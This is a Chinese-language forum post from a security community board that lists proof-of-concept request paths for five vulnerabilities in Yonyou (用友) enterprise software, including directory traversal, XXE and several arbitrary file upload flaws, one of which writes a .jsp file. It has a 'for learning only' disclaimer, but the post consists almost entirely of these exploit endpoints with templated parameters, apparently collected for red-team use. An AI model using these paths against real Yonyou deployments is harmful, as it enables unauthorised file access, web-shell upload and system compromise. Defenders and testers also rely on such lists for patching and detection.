设为首页收藏本站

DecoyMini 技术交流社区 (吉沃科技)»论坛 › 技术区 › 红蓝队对抗 › 用友漏洞 PoC 整理

发新帖

查看: 6151|回复: 0

[2022] 用友漏洞 PoC 整理

吉沃运营专员

188 主题	35 回帖	30 荣誉

Rank: 9 Rank: 9 Rank: 9

UID: 2
积分: 354
精华: 1
沃币: 2 枚
注册时间: 2021-6-24

发表于 2022-8-4 10:26:48 | 显示全部楼层 |阅读模式

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

1、用友 FE 协作办公平台目录遍历

templateOfTaohong_manager.jsp

/system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}

复制代码

2、用友 GRP-U8 财务管理软件任意文件上传

/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=

复制代码

3、用友 NC 系统 uapws wsdl XXE

/uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}}

复制代码

4、用友 u8 cloud 任意文件上传漏洞

/nccloud 前台文件上传

/hrss/servlet/uploadimg2File

复制代码

5、用友时空 KSOA 软件前台文件上传漏洞

/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp

复制代码

用友, NC, KSOA, GRP, 时空

相关帖子

• 情报共享 (8.9)
• 用友漏洞 PoC 整理

DecoyMini·吉星 —— 高可扩展、安全、免费的企业级蜜罐系统

回复

使用道具举报

发新帖

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-11-21 19:50 , Processed in 0.060730 second(s), 27 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表